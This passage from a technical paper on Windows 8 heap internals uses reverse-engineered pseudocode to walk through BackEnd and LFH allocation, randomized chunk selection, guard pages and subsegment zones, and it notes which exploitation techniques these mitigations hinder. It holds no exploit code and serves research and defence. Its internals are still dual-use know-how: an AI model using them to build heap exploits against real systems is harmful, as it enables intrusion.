BackEnd heap attempts to acquire memory on behalf of the calling function. The process of acquiring  
memory from the BackEnd starts with locating an appropriately  sized BlocksIndex  structure and 
identifying  the desired ListHint. If the BlocksIndex  fails to have a sufficiently  sized ListHint, then the 
OutOfRange  ListHint is used (ListHints[BlocksIndex ‐>ArraySize ‐1]).  Finally, the BackEnd allocator can get 
the correct function parameters  and attempt to allocate memory, returning  a chunk on success and an 
error on failure.  
//The maximum  allocation  unit for the LFH 0x4000 bytes 
if(Size > 0x4000)  
{ 
  _HEAP_LIST_LOOKUP  *BlocksIndex;   
  while (BlockSize  >= BlocksIndex ‐>ArraySize)  
  { 
   if(!BlocksIndex ‐>ExtendedLookup)  
   { 
    BlockSize  = BlocksIndex ‐>ArraySize  ‐ 1;  
    break ; 
   } 
   BlocksIndex  = BlocksIndex ‐>ExtendedLookup;   
  } 
 
  //gets the ListHint  index based on the size requested  
  int Index = GetRealIndex(BlocksIndex,  BlockSize);  
 
  _LIST_ENTRY  *hint = Heap‐>ListHints[Index];  
 
  int DummyRet;  
  chunk = RtlpAllocateHeap(Heap,  Flags | 2, Size, RoundSize,  Hint, &DummyRet);  
 
  if(!chunk)  
   return ERROR_NO_MEMORY;  
 
  return chunk; 
} 
 
  
17 | Windows  8 Heap Internals 
 If the size requested  can potentially  be accommodated  by the LFH, then RtlAllocateHeap  will attempt 
to see if the FrontEnd is enabled for the size being requested  (remember  this is the rounded size, not 
the size requested  by the calling function).  If the bitmap indicated  the LFH is servicing request for the 
particular  size, then LFH will pursue allocation.  If the LFH fails or the bitmap says that the LFH is not 
enabled, the routine described  above will execute in an attempt to use the BackEnd heap.  
else 
{ 
  //check  the status bitmap to see if the LFH has been enabled  
  int BitmapIndex  = 1 << (RoundSize  / 8) & 7; 
 
  if(BitmapIndex  & Heap‐>FrontEndStatusBitmap[RoundSize  >> 6]) 
  { 
   //Get the BucketIndex  (as opposed  to passing  a _HEAP_BUCKET)  
   _LFH_HEAP  LFH = Heap‐>FrontEndHeap;  
   unsigned  short BucketIndex  = FrontEndHeapUsageData[BlockSize];  
    
   chunk = RtlpLowFragHeapAllocFromContext(LFH,   
    BucketIndex,  Size, Flags | Heap‐>GlobalFlags);  
  } 
 
  if(!chunk)  
   TryBackEnd();  
  else 
   return chunk; 
} 
 
Note: In Windows  7 the ListHint‐>Blink would have been checked to see if the LFH was activated  for the 
size requested.  The newly created bitmap and usage data array have taken over those responsibilities,  
doubling as an exploitation  mitigation.  
  	
18 | Windows  8 Heap Internals 
 BackEnd 		
The BackEnd allocator is almost identical to the BackEnd of Windows  7 with the only exception  being the 
newly created bitmap and status arrays are used for tracking LFH activation  instead of the ListHint 
Blink . There have also been security features added to virtual allocations  that prevent predictable  
addressing.  The function responsible  for BackEnd allocations  is RtlpAllocateHeap  and has a function 
signature  of:  
void *__fastcall  RtlpAllocateHeap(_HEAP  *Heap, int Flags, int Size, unsigned  int 
RoundedSize,  _LIST_ENTRY  *ListHint,  int *RetCode)  
 
The first step taken by the BackEnd is complementary  to the Intermediate  function to ensure that a 
minimum  and maximum  size is set. The maximum  number of bytes to be allocated must be under 2GB 
and the minimum  will be 16‐bytes, 8‐bytes for the header and 8‐bytes for use. Additionally,  it will check 
to see if the heap is set to use the LFH (it can be set to NEVER use the LFH) and update some heuristics.   
void *Chunk = NULL;  
void *VirtBase;  
bool NormalAlloc  = true ;  
 
//covert  the 8‐byte aligned  amount of bytes 
// to 'blocks'  assuring  space for at least 8‐bytes user and 8‐byte header 
int BlockSize  = RoundedSize  / 8;  
if(BlocksSize  < 2) 
{ 
  BlockSize  = 2;  
  RoundedSize  += 8;  
} 
 
//32‐bit arch will only allocate  less than 2GB 
if(Size >= 0x7FFFFFFF)  
  return 0;  
 
//if we have serialization  enabled  (i.e. use LFH) then go through  some heuristics  
if(!(Flags  & HEAP_NO_SERIALIZE))  
{ 
  //This will activate  the LFH if a FrontEnd  allocation  is enabled  
  if (Heap‐>CompatibilityFlags  & 0x30000000)  
   RtlpPerformHeapMaintenance(vHeap);  
} 
  
  
19 | Windows  8 Heap Internals 
 Next a test is made to determine  if the size being requested  is greater than the VirtualMemoryThreshold  
(set to 0x7F000 in RtlCreateHeap).  If the allocation  is too large, the FreeLists will be bypassed  and 
virtual allocation  will take place. New features added will augment the allocation  with some security 
measures  to ensure that predictable  virtual memory addresses  will not be likely. Windows  8 will 
generate a random number and use it as the start of the virtual memory header , which as a byproduct,  
will randomize  the amount of total memory requested.   
//Virtual  memory threshold  is set to 0x7F000  in RtlCreateHeap()   
if(BlockSize  > Heap‐>VirtualMemoryThreshold)  
{ 
  //Adjust  the size for a _HEAP_VIRTUAL_ALLOC_ENTRY  
  RoundedSize  += 24; 
 
  int Rand = (RtlpHeapGenerateRandomValue32()  & 15) << 12;  
 
  //Total  size needed for the allocation  
  size_t RegionSize  = RoundedSize  + 0x1000 + Rand;  
 
  int Protect  = PAGE_READWRITE;  
  if(Flags & 0x40000)  
   Protect  = PAGE_EXECUTE_READWRITE;  
 
  //if we can't reserve  the memory,  then we're going to abort 
  if(NtAllocateVirtualMemory( ‐1, &VirtBase,  0, &RegionSize,   
   MEM_RESERVE,  Protect)  < 0) 
   return NULL; 
 
  //Return  at an random offset into the virtual  memory 
  _HEAP_VIRTUAL_ALLOC_ENTRY  *Virt = VirtBase  + Rand; 
 
  //If we can't actually  commit the memory,  abort 
  if(NtAllocateVirtualMemory( ‐1, &Virt, 0, &RoundedSize,   
   MEM_COMMIT,  Protect)  < 0) 
  { 
   RtlpSecMemFreeVirtualMemory( ‐1, &VirtBase,  &Rand, MEM_RESET);  
   ++heap‐>Counters.CommitFailures;  
 
   return NULL; 
  } 
 
  //Assign  the size, falgs, etc 
  SetInfo(Virt);   
 
  //add the virtually  allocated  chunk to the list ensuring   
  //safe linking  in at the end of the list 
  if(!SafeLinkIn(Virt))  
   RtlpLogHeapFailure();  
 
  Chunk = Virt + sizeof (_HEAP_VIRTUAL_ALLOC_ENTRY);  
  return Chunk; 
} 
 
  
20 | Windows  8 Heap Internals 
 If a virtual chunk isn’t required,  the BackEnd will attempt to update heuristics  used to let the Heap 
Manager know that the LFH can be used, if enabled and necessary.   
//attempt  to determine  if the LFH should be enabled  for the size requested  
if(BlockSize  >= Heap‐>FrontEndHeapMaximumIndex)  
{ 
  //if a size that could be serviced  by the LFH is requested  
  //attempt  to set flags indicating  bucket activation  is possible  
  if(Size < 0x4000 && (Heap‐>FrontEndHeapType  == 2 && !Heap‐>FrontEndHeap))  
   Heap‐>CompatibilityFlags  |= 0x20000000;  
} 
   
  
21 | Windows  8 Heap Internals 
 Immediate  after compatibility  checks, the desired size is examined  to determine  if it falls within the 
bounds of the LFH. If so, then the allocation  counters are updated and attempt to see if _HEAP_BUCKET  
is active. Should a heap bucket be active, the FrontEndHeapStatusBitmap  will be updated to tell the 
Heap Manager that the next allocation  should come from the LFH, not the BackEnd. Otherwise,  
increment  the allocation  counters to indicate another allocation  has been made, which will count 
towards heap bucket activation .  
else if(Size < 0x4000)  
{ 
  //Heap‐>FrontEndHeapStatusBitmap  has 256 possible  entries  
  int BitmapIndex  = BlockSize  / 8; 
  int BitPos = BlockSize  & 7;  
 
  //if the lfh isn't enabled  for the size we're attempting  to allocate  
  //determine  if we should enable it for the next go‐around 
  if(!((1 << BitPos)  & Heap‐>FrontEndHeapStatusBitmap[BitmapIndex]))  
  { 
   //increment  the counter  used to determine  when to use the LFH 
   unsigned  short Count = Heap‐>FrontEndHeapUsageData[BlockSize]  + 0x21;  
   Heap‐>FrontEndHeapUsageData[BlockSize]  = Count;  
 
   //if there were 16 consecutive  allocation  or many allocations  consider  LFH  
   if((Count  & 0x1F) > 0x10 || Count > 0xFF00)  
   { 
    //if the LFH has been initialized  and activated,  use it 
    _LFH_HEAP  *LFH = NULL;  
    if(Heap‐>FrontEndHeapType  == 2) 
     LFH = heap‐>FrontEndHeap;   
 
    //if the LFH is activated,  it will return a valid index 
    short BucketIndex  =  RtlpGetLFHContext(LFH,  Size);  
    if(BucketIndex  != ‐1) 
    { 
     //store  the heap bucket index 
     Heap‐>FrontEndHeapUsageData[BlockSize]  = BucketIndex;   
 
     //update  the bitmap accordingly  
     Heap‐>FrontEndHeapStatusBitmap[BitmapIndex]  |= 1 << BitPos;   
    } 
    else if(Count > 0x10) 
    { 
     //if we haven't  been using the LFH, we will next time around 
     if(!LFH) 
      Heap‐>CompatibilityFlags  |= 0x20000000;  
    } 
   } 
  } 
} 
 
  
22 | Windows  8 Heap Internals 
 With all the FrontEnd activation  heuristics  out of the way, the BackEnd can now start searching  for a 
chunk to fulfill the allocation  request. The first source examined  is the ListHint passed to 
RtlpAllocateHeap,  which is the obvious choice owing to its acquisition  in RtlAllocateHeap.  If a 
ListHint wasn’t provided or doesn’t contain any free chunks, meaning there was not an exact match for 
the amount of bytes desired, the FreeLists will be traversed  looking for a sufficiently  sized chunk (which 
is any chunk greater than or equal to the request size). On the off chance that there are no chunks of a 
suitable size, the heap must be extended  via RtlpExtendHeap.  The combination  of a failure to find a 
chunk in the FreeLists and the inability to extend the heap will result in returning  with error.  
//attempt  to use the ListHints  to optimally  find a suitable  chunk 
_HEAP_ENTRY  *HintHeader  = NULL;  
_LIST_ENTRY  *FreeListEntry  = NULL;  
if(ListHint  && ListHint ‐>Flink)  
  HintHeader  = ListHint  ‐ 8;  
else 
{ 
  FreeListEntry  = RtlpFindEntry(Heap,  BlockSize);  
  
  if(&Heap‐>FreeLists  == FreeListEntry)   
  { 
   //if the freelists  are empty, you will have to extend the heap 
   _HEAP_ENTRY  *ExtendedChunk  = RtlpExtendHeap(Heap,  aRoundedSize);  
    
   if(ExtendedChunk)  
    HintHeader  = ExtendedChunk;   
   else 
    return NULL; 
  } 
  else 
  { 
   //try to use the chunk from the freelist  
   HintHeader  = FreeListEntry  ‐ 8;  
   if(Heap‐>EncodeFlagMask)  
    DecodeValidateHeader(HintHeader,  Heap);  
 
   int HintSize  = HintHeader ‐>Size;  
 
   //if the chunk isn't big enough,  extend the heap 
   if(HintSize  < BlockSize)  
   { 
    EncodeHeader(HintHeader,  Heap); 
    _HEAP_ENTRY  *ExtendedChunk  = RtlpExtendHeap(Heap,  RoundedSize);  
     
    if(ExtendedChunk)  
     HintHeader  = ExtendedChunk;   
    else 
     return NULL; 
   } 
  } 
} 
 
 
23 | Windows  8 Heap Internals 
 Before returning  the chunk to the user the BackEnd ensures that the item retrieved from the FreeLists is 
not tainted , returning  error if doubly‐linked list tainting has occurred.  This functionality  has been 
around since Windows  XP SP2, and subsequently  killed off generic heap overflow exploitation.   
ListHint  = HintHeader  + 8;  
_LIST_ENTRY  *Flink = ListHint ‐>Flink;  
_LIST_ENTRY  *Blink = ListHint ‐>Blink;   
 
//safe unlinking  or bust 
if(Blink‐>Flink != Flink‐>Blink || Blink‐>Flink != ListHint)  
{ 
  RtlpLogHeapFailure(12,  Heap, ListHint,  Flink‐>Blink,  Blink‐>Flink,  0); 
  return ERROR;  
} 
 
unsigned  int HintSize  = HintHeader ‐>Size;  
_HEAP_LIST_LOOKUP  *BlocksIndex  = Heap‐>BlocksIndex;  
if(BlocksIndex)  
{ 
  //this will traverse  the BlocksIndex  looking  for 
  //an appropriate  index, returning  ArraySize  ‐ 1 
  //for a chunk that doesn't  have a ListHint  (or is too big) 
  HintSize  = SearchBlocksIndex(BlocksIndex);  
} 
   
//updates  the ListHint  linked lists and Bitmap used by the BlocksIndex  
RtlpHeapRemoveListEntry(Heap,  BlocksIndex,  RtlpHeapFreeListCompare,   
  ListHint,  HintSize,  HintHeader ‐>Size);   
 
//unlink  the entry from the linked list  
//safety  check above, so this is OK 
Flink‐>Blink = Blink;  
Blink‐>Flink = Flink;  
 
Note : Header encoding and decoding has been left out to shorten the code. Just remember  that 
decoding will need to take place before header attributes  are accessed and encoded directly thereafter.   
  
24 | Windows  8 Heap Internals 
 Lastly, the header values can be updated and the memory will be zeroed out if required.  I’ve 
purposefully  left out the block splitting process. Please see RtlpCreateSplitBlock  for more 
information  on chunk splitting (which will occur if the UnusedBytes  are greater than 1).  
if( !(HintHeader ‐>Flags & 8) || RtlpCommitBlock(Heap,  HintHeader))  
{ 
  //Depending  on the flags and the unused bytes the header 
  //will set the UnusedBytes  and potentially  alter the 'next'  
  //chunk  directly  after the one acquired  from the FreeLists  
  //which  migh result in a call to RtlpCreateSplitBlock()  
  int UnusedBytes  = HintHeader ‐>Size ‐ RoundedSize;   
  bool OK = UpdateHeaders(HintHeader);  
 
  if(OK) 
  { 
   //We've  updated  all we need, MEM_ZERO  the chunk 
   //if needed and return to the calling  function  
   Chunk = HintHeader  + 8;  
   if(Flags & 8) 
    memset(Chunk,  0, HintHeader ‐>Size ‐ 8); 
 
   return Chunk;  
  } 
  else 
   return ERROR; 
 
} 
else 
{ 
  RtlpDeCommitFreeBlock(Heap,  HintHeader,  HintHeader ‐>Size, 1); 
  return ERROR;  
} 
 
  
25 | Windows  8 Heap Internals 
 Front	End	
The LFH is the sole FrontEnd allocator for Windows  8 and is capable of tracking chunks that have a size 
below 0x4000 bytes (16k). Like Windows  7, the Windows  8 LFH uses UserBlocks , which are pre‐allocated 
containers  for smaller chunks, to service requests.  The similarities  end there, as you will see searching  
for FREE chunks, allocating  UserBlocks  and many other tasks have changed. The function responsible  for 
FrontEnd allocation  is RtlpLowFragHeapAllocFromContext  and has a function signature  of:  
void *RtlpLowFragHeapAllocFromContext(_LFH_HEAP  *LFH, unsigned  short BucketIndex,  int 
Size, char Flags) 
 
The first thing you may notice is that a _HEAP_BUCKET  pointer is no longer passed as a function 
argument,  instead passing the index into the HeapBucket  array within the LFH. It was discussed  
previously  that this prevents an attack devised by Ben Hawkes (Hawkes 2008).  
The first step is determining  if we’re dealing with a size that has been labeled as having affinity and if so, 
initialize all the variables that will be used in the forthcoming  operations.   
_HEAP_BUCKET  *HeapBucket  = LFH‐>Buckets[BucketIndex];  
_HEAP_ENTRY  *Header  = NULL; 
 
int VirtAffinity  = NtCurrentTeb() ‐>HeapVirtualAffinity  ‐ 1; 
int AffinityIndex  = VirtAffinity;  
if(HeapBucket ‐>UseAffinity)  
{ 
  if(VirtAffinity  < 0) 
    AffinityIndex  = RtlpAllocateAffinityIndex();  
 
  //Initializes  all global variables  used for Affinity  based allocations  
  AffinitySetup();  
} 
 
After the affinity variables have been initialized  the FrontEnd decides which array it is going to use to 
acquire a _HEAP_LOCAL_SEGMENT_INFO  structure,  which is ordered by size (and affinity if present). 
Then it will acquire the ActiveSubsegment  which will be used for the upcoming  allocation.   
int SizeIndex  = HeapBucket ‐>SizeIndex;   
_HEAP_LOCAL_SEGMENT_INFO  *LocalSegInfo;   
 
if(AffinityIndex)  
  LocalSegInfo  = LFH‐>AffinitizedInfoArrays[SizeIndex][AffinityIndex  ‐ 1]; 
else 
  LocalSegInfo  = LFH‐>SegmentInfoArrays[SizeIndex];  
 
_HEAP_SUBSEGMENT  *ActiveSubseg  = LocalSegInfo ‐>ActiveSubsegment;  
 
Note : You’ll notice there is no longer a check for a Hint Subsegment  as that functionality  has been 
removed.  
26 | Windows  8 Heap Internals 
 Next, a check is made to ensure that the ActiveSubsegment  is non‐null, checking the cache for 
previously  used _HEAP_SUBSEGMENT  if the ActiveSubsegment  is  NULL . Hopefully  the Subsegment  will 
be valid and the Depth , Hint, and UserBlocks  will be gathered.  The Depth represents  the amount of 
chunks left for a given Subsegment/UserBlock  combo. The Hint was once an offset to the first free 
chunk within the UserBlocks,  but no longer serves that purpose.  
If the UserBlocks  is not setup yet or there are not any chunks left in the UserBlock  container,  the cache 
will be examined  and a new UserBlocks  will be created. Think of this as checking that a swimming  pool 
exists and full of water before diving in head first.  
//This is actually  done in a loop but left out for formatting  reasons  
//The LFH will do its best to attempt  to service  the allocation  before giving up 
if(!ActiveSubseg)  
  goto check_cache;  
 
_INTERLOCK_SEQ  *AggrExchg  = ActiveSubseg ‐>AggregateExchg;  
 
//ensure  the values are acquired  atomically   
int Depth, Hint; 
AtomicAcquireDepthHint(AggrExchg,  &Depth,  &Hint);  
 
//at this point we should have acquired  a sufficient  subsegment  and can 
//now use it for an actual allocation,  we also want to make sure that  
//the UserBlocks  has chunks left along w/ a matching  subsegment  info structures  
_HEAP_USERDATA_HEADER  *UserBlocks  = ActiveSubseg ‐>UserBlocks;   
 
//if the UserBlocks  haven't  been allocated  or the 
//_HEAP_LOCAL_SEGMENT_INFO  structures  don't match 
//attempt  to acquire  a Subsegment  from the cache 
if(!UserBlocks  || ActiveSubseg ‐>LocalInfo  != LocalSegInfo)  
  goto check_cache;  
 
This is where the similarities  to Windows  7 subside and Windows  8 shows its pretty colors.  Instead of 
blindly using the Hint as an index into the UserBlocks , subsequently  updating itself with another un‐
vetted value (FreeEntryOffset ), it uses a random offset into the UserBlocks  as a starting point.  
The first step in the new process is to acquire a random value that was pre‐populated  into a global 
array. By using a random value instead of the next available free chunk, the allocator can avoid 
determinism , putting quite a hindrance  on use‐after‐free and sequential  overflow vulnerabilities.   
//Instead  of using the FreeEntryOffset  to determine  the index 
//of the allocation,  use a random byte to start the search 
short LFHDataSlot  = NtCurrentTeb() ‐>LowFragHeapDataSlot;  
BYTE Rand = RtlpLowFragHeapRandomData[LFHDataSlot];  
NtCurrentTeb() ‐>LowFragHeapDataSlot++;  
  
 
27 | Windows  8 Heap Internals 
 Next the bitmap , which is used to determine  which chunks are free and which chunks are busy in a 
UserBlock  container,  is acquired and a starting offset is chosen for identifying  free chunks.  
//we need to know the size of the bitmap we're searching  
unsigned  int BitmapSize  = UserBlocks ‐>BusyBitmap ‐>SizeOfBitmap;  
 
//Starting  offset into the bitmap to search for a free chunk 
unsigned  int StartOffset  = Rand; 
 
void *Bitmap  = UserBlocks ‐>BusyBitmap ‐>Buffer;  
  
if(BitmapSize  < 0x20) 
  StartOffset  = (Rand * BitmapSize)  / 0x80; 
else 
  StartOffset  = SafeSearchLargeBitmap(UserBlocks ‐>BusyBitmap ‐>Buffer);  
  
Note : The StartOffset  might not actually be FREE. It is only the starting point for searching  for a FREE 
chunk.  
The bitmap is then rotated to the right ensuring that, although we’re starting at a random location, all 
possible positions will be examined.  Directly thereafter,  the bitmap is inverted, due to the way the 
assembly  instruction  bsf works. It will scan a bitmap looking for the first instance of a bit being 1. Since 
we’re interested  in FREE chunks, the bitmap must be inverted to turn all the 0s into 1s.  
//Rotate  the bitmap (as to not lose items) to start  
//at our randomly  chosen offset 
int RORBitmap  = __ROR__(*Bitmap,  StartOffset);    
 
//since  we're looking  for 0's (FREE chunks)  
//we'll  invert the value due to how the next instruction  works  
int InverseBitmap  = ~RORBitmap;  
 
//these  instructions  search from low order bit to high order bit looking  for a 1 
//since  we inverted  our bitmap,  the 1s will be 0s (BUSY) and the 0s will be 1s (FREE) 
//     <‐‐ search direction  
//H.O                                                   L.O 
//‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐  
//| 1 | 1 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 1 | 0 | 0 | 0 
//‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐  
//the following  code would look at the bitmap above, starting  at L.O 
//looking  for a bit position  that contains  the value of one, and storing  that index 
int FreeIndex;  
__asm {bsf FreeIndex,  InverseBitmap};  
 
  
28 | Windows  8 Heap Internals 
 Now the bitmap needs updated and the address of the actual chunk of memory needs to be derived 
from the index of the bitmap, which could be different than the StartOffset  (depending  on which 
chunks are free and which chunks are busy). The Depth can be decremented  by 1 and the Hint is 
updated, although it is not used as an allocation  offset anymore.   
The header of the chunk is acquired by taking the starting address of the UserBlocks  and adding the 
FirstAllocationOffset.  Then the index from the bitmap (which has a one‐to‐one correlation  to the 
UserBlocks)  is multiplied  by the BlockStride.   
//shows  the difference  between  the start search index and 
//the actual index of the first free chunk found 
int Delta = ((BYTE)FreeIndex  + (BYTE)StartOffset)  & 0x1F; 
 
//now that we've found the index of the chunk we want to allocate  
//mark it as 'used';  as it previously  was 'free' 
*Bitmap  |= 1 << Delta; 
 
//get the location  (current  index into the UserBlock)  
int NewHint  = Delta + sizeof (_HEAP_USERDATA_HEADER)  *  
(Bitmap  ‐ UserBlocks ‐>BusyBitmap ‐>Buffer);   
 
AggrExchg.Depth  = Depth ‐ 1;  
AggrExchg.Hint  = NewHint;   
 
//get the chunk header for the chunk that we just allocated  
Header = (_HEAP_ENTRY)UserBlocks  + UserBlocks ‐>FirstAllocationOffset  + (NewHint  * 
UserBlocks ‐>BlockStride);  
 
Finally there are some checks on the header to guarantee  that a non‐corrupted  chunk is returned.  Lastly 
the chunk’s header is updated and returned to the calling function.  
//if we've gotten a chunk that has certain  attributes,  report failure  
if(Header ‐>UnusedBytes  & 0x3F) 
  RtlpReportHeapFailure(14,  LocalSegInfo ‐>LocalData ‐>LowFragHeap ‐>Heap,  
  Header,  0, 0, 0); 
 
if(Header)  
{ 
  if(Flags & 8) 
   memset(Header  + 8, 0, HeapBucket ‐>BlockUnits  ‐ 8);  
 
  //set the unused bytes if there are any 
  int Unused = (HeapBucket ‐>BlockUnits  * 8) ‐ Size; 
  Header‐>UnusedBytes  = Unused | 0x80;  
  if(Unused  >= 0x3F)  
  { 
   _HEAP_ENTRY  *Next = Header + (8 * HeapBucket ‐>BlockUnits)  ‐ 8;  
   Next‐>PreviousSize  = Unused;   
   Header‐>UnusedBytes  = 0xBF;  
  } 
    
  return Header + sizeof (_HEAP_ENTRY);    
} 
29 | Windows  8 Heap Internals 
 Unfortunately,  there are times were a _HEAP_SUBSEGMENT  and corresponding  UserBlocks  aren’t 
initialized,  for example the first LFH allocation  for a specific size. The first thing that needs to happens, as 
shown above, is the Subsegment  cache needs to be searched.  If a cached _HEAP_SUBSEGMENT  doesn’t 
exist, one will be created later.  
_HEAP_SUBSEGMENT  *NewSubseg  = NULL;  
NewSubseg  = SearchCache(LocalSegInfo);   
 
Note : I’ve narrowed  down cache search functionality.  Please look at the binary for more detailed 
information.   
At this point, a UserBlocks  needs to be created so chunks of the requested  size will be available to the 
LFH. While the exact formula to determine  the overall UserBlocks  size is a bit complicated,  it will suffice 
to say that it is based off the size requested,  the total number of chunks that exist for that size (per 
_HEAP_LOCAL_SEGMENT_INFO),  and affinity .  
int PageShift,  BlockSize;   
int TotalBlocks  = LocalSegInfo ‐>Counters ‐>TotalBlocks;  
 
//Based  on the amount of chunks allocated  for a given  
//_HEAP_LOCAL_SEGMENT_INFO  structure,  and the _HEAP_BUCKET   
//size and affinity  formulate  how many pages to allocate  
CalculateUserBlocksSize(HeapBucket,  &PageShift,  &TotalBlocks,  &BlockSize);   
 
Note : Please see the binary for much more detailed information  on the UserBlocks  size calculation.  
The next portion of code was added during the Consumer  Preview as a way to prevent sequential  
overflows  from corrupting  adjacent memory. By signaling that a guard page should be present if certain 
criteria are met, the Heap Manager can ensure that some overflows  will attempt to access invalid 
memory, terminating  the process. This guard page flag is then passed to RtlpAllocateUserBlock  so 
additional  memory will be accounted  for when UserBlocks  allocation  takes place.  
//If we've seen enough allocations  or the number of pages 
//to allocate  is very large, we're going to set a guard page 
//after  the UserBlocks  container  
bool SetGuard  = false ;  
if(PageShift  == 0x12 || TotalBlocks  >= 0x400) 
  SetGuard  = true ;  
 
//Allocate  memory for a new UserBlocks  structure  
_HEAP_USERDATA_HEADER  *UserBlock  =  
  RtlpAllocateUserBlock(LFH,  PageShift,  BlockSize  + 8, SetGuard);  
 
if(UserBlock  == NULL) 
  return 0; 
 
30 | Windows  8 Heap Internals 
 The Windows  8 version of RtlpAllocateUserBlock  is almost like its Windows  7 counterpart,  albeit with 
one small difference.  Instead of handling the BackEnd allocation  itself, the responsibilities  are passed off 
to a function called RtlpAllocateUserBlockFromHeap.   
RtlpAllocateUserBlock  has a function signature  of: 
_HEAP_USERDATA_HEADER  *RtlpAllocateUserBlock(_LFH_HEAP  *LFH, unsigned  __int8 PageShift,  
int ChunkSize,  bool SetGuardPage)  
 
_HEAP_USERDATA_HEADER  *UserBlocks;   
int ByteSize  = 1 << PageShift;   
if(ByteSize  > 0x78000)  
  ByteSize  = 0x78000;   
 
UserBlocks  = CheckCache(LFH ‐>UserBlockCache,  PageShift);   
if(!UserBlocks)  
  UserBlocks  = RtlpAllocateUserBlockFromHeap(LFH ‐>Heap, PageShift,   
      ChunkSize,  SetGuardPage);   
 
UpdateCounters(LFH ‐>UserBlockCache,  PageShift);   
 
return UserBlocks;     
  
RtlpAllocateUserBlockFromHeap  serves as the allocator for the UserBlock  container  with the small 
caveat of adding a guard page if necessary.  Its function signature  is:  
_HEAP_USERDATA_HEADER  *RtlpAllocateUserBlockFromHeap(_HEAP  *Heap, PageShift,  ChunkSize,  
SetGuardPage)  
  
The first order of business for RtlpAllocateUserBlockFromHeap  is to get the proper size, in bytes, to 
be allocated for the desired UserBlock  container,  while enforcing  a maximum  value. It will then allocate 
the UserBlocks  and return NULL if there is insufficient  memory.  
int ByteSize  = 1 << PageShift;  
if(ByteSize  > 0x78000)  
  ByteSize  = 0x78000;   
 
int SizeNoHeader  = ByteSize  ‐ 8;  
int SizeNoHeaderOrig  = SizeNoHeader;  
 
//Add extra space for the guard page 
if(SetGuardPage)  
  SizeNoHeader  += 0x2000;   
 
_HEAP_USERDATA_HEADER  *UserBlocks  = RtlAllocatHeap(Heap,  0x800001,  SizeNoHeader);   
if(!UserBlocks)  
  return NULL;  
  
 
31 | Windows  8 Heap Internals 
 Next RtlpAllocateUserBlockFromHeap  will check if the SetGuardPage  variable is set to true, indicating  
that, indeed, additional  protection  between UserBlocks  should be enforced.  If additional  protection  is 
necessary,  an extra page (0x1000 bytes) of memory is added to the overall total and given access 
permissions  of PAGE_NOACCESS.  Lastly the _HEAP_USERDATA_HEADER  members  are updated to 
indicate that a guard page was added and the container  object is returned to  RtlpAllocateUserBlock . 
if(!SetGuardPage)  
{ 
  UserBlocks ‐>GuardPagePresent  = false ; 
  return UserBlocks;   
} 
 
//add in a guard page so that a sequential  overflow  will fail  
//as PAGE_NOACCESS  will raise a AV on read/write  
int GuardPageSize  = 0x1000;   
int AlignedAddr  = (UserBlocks  + SizeNoHeaderOrig  + 0xFFF) & 0xFFFFF000;   
int NewSize  = (AlignedAddr  ‐ UserBlocks)  + GuardPageSize;   
 
//reallocate  the memory 
UserBlocks  = RtlReAllocateHeap(Heap,  0x800001,  UserBlocks,  NewSize);   
 
//Sets the last page (0x1000  bytes) of the memory chunk to PAGE_NOACCESS  (0x1) 
//http://msdn.microsoft.com/en ‐us/library/windows/desktop/aa366786(v=vs.85).aspx   
ZwProtectVirtualMemory( ‐1, &AlignedAddr,  &GuardPageSize,  PAGE_NOACCESS,  &output);   
 
//Update  the meta data for the UserBlocks  
UserBlocks ‐>GuardPagePresent  = true ;  
UserBlocks ‐>PaddingBytes  = (SizeNoHeader  ‐ GuardPageSize)  ‐ SizeNoHeaderOrig;  
UserBlocks ‐>SizeIndex  = PageShift;   
 
return UserBlocks;   
 
From here RtlpAllocateUserBlock  returns a UserBlock  container  back to 
RtlpLowFragHeapAllocFromContext  which will eventually  be associated  with a _HEAP_SUBSEGMENT  
structure.    
The Subsegment  will either come from a _HEAP_SUBSEGMENT  zone , which is a region of pre‐allocated  
memory that is specifically  designed to hold an array of Subsegment  structures,  or by acquiring  a 
Subsegment  via a previously  deleted structure.  If a Subsegment  cannot be procured,  the FrontEnd 
allocator has failed and will return, resulting in the BackEnd heap servicing the request.  
//See if there are previously  deleted  Subsegments  to use 
NewSubseg  = CheckDeletedSubsegs(LocalSegInfo);   
 
if(!NewSubseg)  
  NewSubseg  = RtlpLowFragHeapAllocateFromZone(LFH,  AffinityIndex);   
 
//if we can't get a subsegment  we can't fulfill  this allocation  
if(!NewSubseg)  
  return ;  
  
32 | Windows  8 Heap Internals 
 RtlpLowFragHeapAllocateFromZone  is also responsible  for providing  a _HEAP_SUBSEGMENT  back to 
the FrontEnd heap. It will attempt to pull an item from a previously  allocated pool (or zone ), allocating  a 
new pool if one is not present or lacks sufficient  space. It has a function signature  of:  
_HEAP_SUBSEGMENT  *RtlpLowFragHeapAllocateFromZone(_LFH_HEAP  *LFH, int AffinityIndex)  
 
The first operation  that RtlpLowFragHeapAllocateFromZone  performs  is attempting  to acquire a 
_HEAP_SUBSEGMENT  from the pre‐allocated zone stored in the _HEAP_LOCAL_DATA  structure.  If a 
zone doesn’t exist or doesn’t contain sufficient  space, one will be created . Otherwise,  the Subsegment  is 
returned back RtlpLowFragHeapAllocFromContext .  
int LocalIndex  = AffinityIndex  * sizeof (_HEAP_LOCAL_DATA);   
_LFH_BLOCK_ZONE  *Zone = NULL;  
_LFH_BLOCK_ZONE  *NewZone;  
char *FreePtr  = NULL;  
 
try_zone:  
//if there aren’t any CrtZones  allocate  some 
Zone = LFH‐>LocalData[LocalIndex] ‐>CrtZone;   
if(Zone) 
{ 
  //this is actually  done atomically  
  FreePtr  = Zone‐>FreePointer;  
  if(FreePtr  + 0x28 < Zone‐>Limit)  
  { 
   AtomicIncrement(&Zone ‐>FreePointer,  0x28);  
   return FreePtr;   
  } 
} 
  
33 | Windows  8 Heap Internals 
 There may not always be a zone or sufficient  space, so the function will attempt to allocate memory 
from the BackEnd heap to use if needed. Pending allocation  success and linked list checking,  the new 
zone will be linked in and a _HEAP_SUBSEGMENT  will be returned . If the doubly linked list is corrupted,  
execution  will immediate  halt by triggering  an interrupt.   
//allocate  1016 bytes for _LFH_BLOCK_ZONE  structs  
